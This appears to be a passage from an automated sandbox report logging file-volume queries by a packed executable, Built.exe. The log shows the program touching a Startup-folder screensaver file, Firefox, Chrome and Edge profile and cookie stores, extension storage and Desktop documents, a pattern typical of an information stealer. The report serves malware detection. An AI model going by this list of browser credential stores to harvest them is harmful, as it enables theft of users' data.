    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\_ctypes.pyd VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\blank.aes VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\blank.aes VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\blank.aes VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\blank.aes VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\blank.aes VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\blank.aes VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\_lzma.pyd VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\_bz2.pyd VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\_sqlite3.pyd VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\_socket.pyd VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\select.pyd VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\_ssl.pyd VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\_hashlib.pyd VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\_queue.pyd VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\unicodedata.pyd VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\DVWHKMNFNN.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\DVWHKMNFNN.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.docx VolumeInformation
